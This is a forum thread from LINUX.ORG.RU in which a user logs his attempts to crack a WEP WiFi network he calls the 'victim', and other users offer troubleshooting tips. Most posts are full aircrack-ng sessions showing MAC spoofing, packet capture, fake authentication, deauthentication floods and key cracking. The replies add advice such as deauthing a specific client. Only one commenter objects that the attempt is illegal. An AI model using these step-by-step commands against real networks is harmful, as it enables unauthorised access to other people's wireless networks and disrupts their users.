LINUX.ORG.RU

Cracking WiFi with aircrack-ng?



console 1:

#XX:XX:XX:XX:XX:XX - my MAC
#XX:XX:XX:XX:XX:X1 - my iPhone (not used)
#XX:XX:XX:XX:XX:X2 - victim
#d6:ee:41:69:48:cf - fake
root@adr-laptop:/home/adr# airmon-ng start wlan0


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
929	NetworkManager
930	avahi-daemon
931	avahi-daemon
4214	dhclient
4756	wpa_supplicant


Interface	Chipset		Driver

wlan0		Unknown 	brcmsmac - [phy0]
				(monitor mode enabled on mon0)

root@adr-laptop:/home/adr# ifconfig mon0 down
root@adr-laptop:/home/adr# macchanger -r mon0
Permanent MAC: XX:XX:XX:XX:XX:XX (Hon Hai Precision Ind. Co.,ltd.)
Current   MAC: XX:XX:XX:XX:XX:XX (Hon Hai Precision Ind. Co.,ltd.)
New       MAC: d6:ee:41:69:48:cf (unknown)
root@adr-laptop:/home/adr# ifconfig mon0 up
root@adr-laptop:/home/adr# airodump-ng mon0

 CH  1 ][ Elapsed: 16 s ][ 2011-11-06 13:51                                         
                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID             
                                                                                            
 XX:XX:XX:XX:XX:X1   -1      101        0    0   6  36 . OPN              iPhone-ADR MyWi   
 XX:XX:XX:XX:XX:X2  -87        3        0    0   3  54e. WEP  WEP         Baze              
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                  
                                                                                             
 XX:XX:XX:XX:XX:X1  XX:XX:XX:XX:X1  -30    0 -12     22      101         
                  
#ctrl + c

root@adr-laptop:/home/adr# airodump-ng mon0 -c 3 --bssid XX:XX:XX:XX:XX:X2 -w wifiCrack/Baze.out

 CH  3 ][ Elapsed: 16 s ][ 2011-11-06 13:53 ][ fixed channel mon0: -1
                                                                                            
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID         
                                                                                            
 XX:XX:XX:XX:XX:X2  -87   8       27        0    0   3  54e. WEP  WEP         Baze          
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe   
 
#ctrl + c

root@adr-laptop:/home/adr# airodump-ng mon0 -c 3,3 --bssid XX:XX:XX:XX:XX:X2 -w wifiCrack/Baze.out

 CH  3 ][ Elapsed: 8 s ][ 2011-11-06 13:54                                         
                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID             
                                                                                            
 XX:XX:XX:XX:XX:X2  -86       14        0    0   3  54e. WEP  WEP         Baze              
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe  
 
 
#run aireplay-ng

CH  3 ][ Elapsed: 2 mins ][ 2011-11-06 13:56                                         
                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID             
                                                                                            
 XX:XX:XX:XX:XX:X2  -86      246        0    0   3  54e. WEP  WEP         Baze              
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                  
                                                                                            
 XX:XX:XX:XX:XX:X2  D6:EE:41:69:48:CF    0    0 - 1      0       12

console 2:

root@adr-laptop:/home/adr# aireplay-ng -1 0 -a XX:XX:XX:XX:XX:X2 -e Baze mon0
No source MAC (-h) specified. Using the device MAC (D6:EE:41:69:48:CF)
13:56:22  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:X2) on channel -1
13:56:22  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
root@adr-laptop:/home/adr# aireplay-ng -1 0 -a XX:XX:XX:XX:XX:X2 -e Baze mon0 --ignore-negative-one
No source MAC (-h) specified. Using the device MAC (D6:EE:41:69:48:CF)
13:56:31  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:X2) on channel -1

13:56:31  Sending Authentication Request (Open System)

13:56:33  Sending Authentication Request (Open System)

13:56:35  Sending Authentication Request (Open System)

13:56:37  Sending Authentication Request (Open System)

13:56:39  Sending Authentication Request (Open System)

13:56:41  Sending Authentication Request (Open System)

13:56:43  Sending Authentication Request (Open System)

13:56:45  Sending Authentication Request (Open System)

13:56:47  Sending Authentication Request (Open System)

13:56:49  Sending Authentication Request (Open System)

13:56:51  Sending Authentication Request (Open System)

13:56:53  Sending Authentication Request (Open System)

13:56:55  Sending Authentication Request (Open System)

13:56:57  Sending Authentication Request (Open System)

13:56:59  Sending Authentication Request (Open System)

13:57:01  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

root@adr-laptop:/home/adr# 

system

root@adr-laptop:/home/adr# lspci | grep -i net
02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller (rev 02)
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)

root@adr-laptop:/home/adr# ifconfig
eth2      Link encap:Ethernet  HWaddr XX:XX:XX:XX:X1 #iPhone
          inet addr:192.168.21.7  Bcast:192.168.21.255  Mask:255.255.255.0
          inet6 addr: fe80::21f:5bff:fe59:d74c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:30047 errors:0 dropped:1 overruns:0 frame:0
          TX packets:32494 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:18590227 (18.5 MB)  TX bytes:5893094 (5.8 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:4493 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4493 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:356204 (356.2 KB)  TX bytes:356204 (356.2 KB)

mon0      Link encap:UNSPEC  HWaddr D6-EE-41-69-48-CF-30-30-00-00-00-00-00-00-00-00  
          UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI  MTU:1500  Metric:1
          RX packets:14599 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2061943 (2.0 MB)  TX bytes:0 (0.0 B)

wlan0     Link encap:Ethernet  HWaddr XX:XX:XX:XX:XX
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


root@adr-laptop:/home/adr# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=19 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth2      no wireless extensions.

mon0      IEEE 802.11bgn  Mode:Monitor  Tx-Power=19 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

root@adr-laptop:/home/adr# airdriver-ng detect

Found "Broadcom 4300" device: (bcm43xx)
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)

Found "Broadcom 4300" device: (bcm43xx-mac80211)
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)


USB devices (generic detection):
Bus 002 Device 003: ID 04fc:05d8 Sunplus Technology Co., Ltd Wireless keyboard/mouse

PCI devices (generic detection):
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)

root@adr-laptop:/home/adr# uname -a
Linux adr-laptop 3.0.0-12-generic-pae #20-Ubuntu SMP Fri Oct 7 16:37:17 UTC 2011 i686 i686 i386 GNU/Linux

#OS: Ubuntu 11.10

trying to kill whatever is interfering...

root@adr-laptop:/home/adr# airmon-ng start


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
929	NetworkManager
930	avahi-daemon
931	avahi-daemon
4214	dhclient
4756	wpa_supplicant

root@adr-laptop:/home/adr# service network-manager stop
network-manager stop/waiting
root@adr-laptop:/home/adr# kill 930 931 4214 4756
root@adr-laptop:/home/adr# airmon-ng start


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
6835	avahi-daemon
6836	avahi-daemon


usage: airmon-ng <start|stop|check> <interface> [channel or frequency]

after that the first two listings repeat .. (nothing changed)



Last edited by: ADR (total edits: 2)

> 6835 avahi-daemon
service avahi-daemon stop, obviously

> after that the first two listings repeat ..

Have you tried other attack types?

AITap ★★★★★

There's some problem with the Broadcom card. On mine I think I solved it with iwconfig and by setting wlan0 to the right channel, I don't remember exactly.

It's simpler to forget about aireplay and just capture packets with airodump. The main thing is to catch the moment of authentication. Oh, and it's better to collect in the evening, when there is traffic.

alius-miles

In reply to: comment by ADR

man aireplay-ng, Attack modes.

-0 is the most useful, since it forces all clients to disconnect, giving airodump a chance to capture the authentication packets.

alius-miles

In reply to: comment by AITap

same thing...

14:48:13  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX) on channel -1

no... could you give a description?

#test
#console1
 CH  3 ][ Elapsed: 7 mins ][ 2011-11-06 14:55                                         
                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID             
                                                                                            
 00:15:6D:FA:89:F0  -88      688        0    0   3  54e. WEP  WEP         Baze              
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                  
                                                                                            
 00:15:6D:FA:89:F0  00:9D:9C:F1:9C:D4    0    0 - 1    323        4                          
 00:15:6D:FA:89:F0  00:CD:7B:08:6E:00    0    0 - 1    327        4                          
 00:15:6D:FA:89:F0  00:59:76:30:B6:1A    0    0 - 1    331        4                          
 00:15:6D:FA:89:F0  00:85:AC:71:DE:7E    0    0 - 1    335        4                          
 00:15:6D:FA:89:F0  00:44:F6:16:26:23    0    0 - 1    339        4                          
 00:15:6D:FA:89:F0  00:A9:06:96:23:02    0    0 - 1    343        4                          
 00:15:6D:FA:89:F0  00:2E:F1:FF:38:4E    0    0 - 1    347        4                          
 00:15:6D:FA:89:F0  00:C5:EE:A0:85:95    0    0 - 1    351        4                          
 00:15:6D:FA:89:F0  00:98:B2:5C:A4:9D    0    0 - 1    355        4                          
 00:15:6D:FA:89:F0  00:86:4E:59:D2:E8    0    0 - 1    359        4                          
 00:15:6D:FA:89:F0  00:D2:13:E2:2D:6F    0    0 - 1    363        4                          
 00:15:6D:FA:89:F0  00:CE:47:7A:FC:AE    0    0 - 1    367        4                          
 00:15:6D:FA:89:F0  00:6C:69:0A:5D:AA    0    0 - 1    371        4                          
 00:15:6D:FA:89:F0  00:4A:03:C0:A7:8D    0    0 - 1    375        4      


#console2
root@adr-laptop:/home/adr# aireplay-ng -9 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
14:55:16  Waiting for beacon frame (BSSID: 00:15:6D:FA:89:F0) on channel -1
14:55:18  Trying broadcast probe requests...
14:55:20  No Answer...
14:55:20  Found 1 AP 

14:55:20  Trying directed probe requests...
14:55:20  00:15:6D:FA:89:F0 - channel: 0 - 'Baze'
14:55:26   0/30:   0%

the others have no effect on airodump-ng ... if that's what you mean?

root@adr-laptop:/home/adr# aireplay-ng -0 10 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
14:51:21  Waiting for beacon frame (BSSID: 00:15:6D:FA:89:F0) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
14:51:21  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:22  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:22  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:23  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:23  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:24  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:24  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:25  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:25  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:25  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
root@adr-laptop:/home/adr# man aireplay-ng
man: can't resolve /usr/share/man/man1//usr/share/man/man1/aireplay-ng.1.gz: No such file or directory
root@adr-laptop:/home/adr# aireplay-ng -2 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
^Cad 341 packets...
root@adr-laptop:/home/adr# aireplay-ng -3 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
14:52:39  Waiting for beacon frame (ESSID: Baze) on channel -1
Found BSSID "00:15:6D:FA:89:F0" to given ESSID "Baze".
Saving ARP requests in replay_arp-1106-145242.cap
You should also start airodump-ng to capture replies.
^Cad 360 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
root@adr-laptop:/home/adr# aireplay-ng -4 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
14:53:23  Waiting for beacon frame (ESSID: Baze) on channel -1
Found BSSID "00:15:6D:FA:89:F0" to given ESSID "Baze".
^Cad 170 packets...
root@adr-laptop:/home/adr# aireplay-ng -5 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
14:53:47  Waiting for beacon frame (ESSID: Baze) on channel -1
Found BSSID "00:15:6D:FA:89:F0" to given ESSID "Baze".
14:53:47  Waiting for a data packet...
^Cad 83 packets...
root@adr-laptop:/home/adr# aireplay-ng -6 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
14:54:03  Waiting for beacon frame (ESSID: Baze) on channel -1
Found BSSID "00:15:6D:FA:89:F0" to given ESSID "Baze".
Saving ARP requests in replay_arp-1106-145404.cap
You should also start airodump-ng to capture replies.
^Cad 144 packets (0 ARPs, 0 ACKs), sent 0 packets...(0 pps)
root@adr-laptop:/home/adr# aireplay-ng -7 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
^Cad 215 packets...
root@adr-laptop:/home/adr# aireplay-ng -8 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
14:54:57  Waiting for beacon frame (ESSID: Baze) on channel -1
Found BSSID "00:15:6D:FA:89:F0" to given ESSID "Baze".
Saving ARP requests in replay_arp-1106-145458.cap
You should also start airodump-ng to capture replies.
Remember to filter the capture to only keep WEP frames:  "tshark -R 'wlan.wep.iv' -r capture.cap -w outcapture.cap"
^Cad 96 packets (0 ARPs, 0 ACKs), sent 0 packets...(0 pps)

root@adr-laptop:/home/adr# echo 1024 >/proc/sys/dev/rtc/max-user-freq
bash: /proc/sys/dev/rtc/max-user-freq: No such file or directory

ADR (topic author)

In reply to: comment by zhekas

and how do I check which channel the card is on? iwconfig somehow doesn't want to fix it ...

ADR (topic author)

In reply to: comment by ADR

> root@adr-laptop:/home/adr# aireplay-ng -0 10 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one

NB: this attack is more effective when targeting

a connected wireless client (-c <client's mac>).


Specify the MAC address of the victim client,

For the other kinds of attack, read: http://linux.die.net/man/1/aireplay-ng

All of them, naturally, make sense only if clients are connected to the AP (and most of them also require some exchange of data with the AP).

AITap ★★★★★

In reply to: comment by alius-miles

two days already((

root@adr-laptop:/home/adr/wifiCrack# aircrack-ng -n 128 -b 00:15:6D:FA:89:F0 Baze.out-*.cap
Opening Baze.out-01.cap
Opening Baze.out-02.cap
Opening Baze.out-03.cap
Opening Baze.out-04.cap
Opening Baze.out-05.cap
Opening Baze.out-06.cap
Opening Baze.out-07.cap
Opening Baze.out-08.cap
Got no data packets from target network!


Quitting aircrack-ng...

ADR (topic author)

In reply to: comment by ADR

With that many connected clients, not catching any packets (#Data) at all is very strange.

Try:

ifconfig wlan0 down

change the MAC

iwconfig wlan0 channel 3

ifconfig wlan0 up


airmon-ng start wlan0 3


start airodump
start aireplay -0 with the -c option [MAC of a connected client]


alius-miles

In reply to: comment by alius-miles

hm ... where does it say anything about clients?? shouldn't they be at the bottom? there it's only the iPhone and me ...

I was visiting someone and tried to authenticate (aireplay-ng -1 0) to a WiFi network with WPA2

No source MAC (-h) specified. Using the device MAC (XX:XX:XX:XX:XX:XX)
19:37:44  Waiting for beacon frame (BSSID: YY:YY:YY:YY:YY:YY) on channel -1

19:37:44  Sending Authentication Request (Open System)

19:37:46  Sending Authentication Request (Open System)
19:37:46  Authentication successful
19:37:46  Sending Association Request
19:37:46  Denied (code 12), wrong ESSID or WPA ?

19:37:49  Sending Authentication Request (Open System)
19:37:49  Authentication successful
19:37:49  Sending Association Request
19:37:49  Denied (code 12), wrong ESSID or WPA ?

so everything is fine (authentication goes through), and my signal is just weak? but it worked every other time ... one time it authenticates, the next it doesn't. (I changed the MAC, restarted mon0 ...) what can this depend on? (it authenticated with the native MAC)

ADR (topic author)

In reply to: comment by ADR

these "clients" appeared after aireplay-ng -9 (test)

ADR (topic author)

Script kiddies in the thread, everyone into the car!
OP, I don't advise you to break into anything; at the very least it's illegal.

CYB3R ★★★★★

http://www.aircrack-ng.org Search the forum for "fixed channel mon0: - 1". Look there as well for a patch for your Broadcom. Patch and compile everything..... PROFIT!!! There will be no details, since I'm writing from a PDA.

FatPinguin

In reply to: comment by ADR

At the bottom, the STATION column is the list of connected clients. If there are clients and it collects Beacons, it should catch Data. If not, no idea. Check the aircrack forum.

alius-miles

In reply to: comment by FatPinguin

done! I have no drivers any more(( compiling by hand:

adr@adr-laptop:/usr/src/bcmwl-5.100.82.38+bdcom$ sudo make
KBUILD_NOPEDANTIC=1 make -C /lib/modules/`uname -r`/build M=`pwd`
make[1]: Вхожу у каталог "/usr/src/linux-headers-3.0.0-12-generic-pae"
  CC [M]  /usr/src/bcmwl-5.100.82.38+bdcom/src/wl/sys/wl_linux.o
/usr/src/bcmwl-5.100.82.38+bdcom/src/wl/sys/wl_linux.c: In function ‘wl_attach’:
/usr/src/bcmwl-5.100.82.38+bdcom/src/wl/sys/wl_linux.c:485:3: error: implicit declaration of function ‘init_MUTEX’ [-Werror=implicit-function-declaration]
cc1: some warnings being treated as errors

make[2]: *** [/usr/src/bcmwl-5.100.82.38+bdcom/src/wl/sys/wl_linux.o] Помилка 1
make[1]: *** [_module_/usr/src/bcmwl-5.100.82.38+bdcom] Помилка 2
make[1]: Залишаю каталог "/usr/src/linux-headers-3.0.0-12-generic-pae"
make: *** [all] Помилка 2
adr@adr-laptop:/usr/src/bcmwl-5.100.82.38+bdcom$ 

ADR (topic author)

In reply to: comment by ADR

don't know why, but WiFi started working again)

though the previous patch did manage to fix the channel, it gave nothing ...

root@adr-laptop:~# aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX -e Baze mon0 
No source MAC (-h) specified. Using the device MAC (20:B8:9F:AD:98:D1)
10:51:37  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 3

10:51:38  Sending Authentication Request (Open System)

10:51:40  Sending Authentication Request (Open System)

10:51:42  Sending Authentication Request (Open System)

10:51:44  Sending Authentication Request (Open System)

10:51:46  Sending Authentication Request (Open System)

10:51:48  Sending Authentication Request (Open System)

10:51:50  Sending Authentication Request (Open System)

10:51:52  Sending Authentication Request (Open System)

10:51:54  Sending Authentication Request (Open System)

10:51:56  Sending Authentication Request (Open System)

10:51:58  Sending Authentication Request (Open System)

10:52:00  Sending Authentication Request (Open System)

10:52:02  Sending Authentication Request (Open System)

10:52:04  Sending Authentication Request (Open System)

10:52:06  Sending Authentication Request (Open System)

10:52:08  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

root@adr-laptop:~# 

ADR (topic author)

In reply to: comment by ADR

don't know why, but WiFi disappeared ... again ... all the necessary modules are present

adr@adr-laptop:~$ sudo ifconfig wlan0 up
wlan0: ERROR while getting interface flags: No such device
adr@adr-laptop:~$ cat /proc/modules | grep -i br
brcmsmac 582674 0 - Live 0x00000000
brcmutil 16885 1 brcmsmac, Live 0x00000000
mac80211 264750 1 brcmsmac, Live 0x00000000
cfg80211 166959 2 brcmsmac,mac80211, Live 0x00000000
crc_ccitt 12595 1 brcmsmac, Live 0x00000000

ADR (topic author)

> #ctrl + c
>
> root@adr-laptop:/home/adr# airodump-ng mon0 -c 3 --bssid XX:XX:XX:XX:XX:X2 -w wifiCrack/Baze.out
>
> CH 3 ][ Elapsed: 16 s ][ 2011-11-06 13:53 ][ fixed channel mon0: -1
> BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
> XX:XX:XX:XX:XX:X2 -87 8 27 0 0 3 54e. WEP WEP Baze
> BSSID STATION PWR Rate Lost Frames Probe
> #ctrl + c

wow, what a prankster you are!

the party van is already on its way for you!

havelite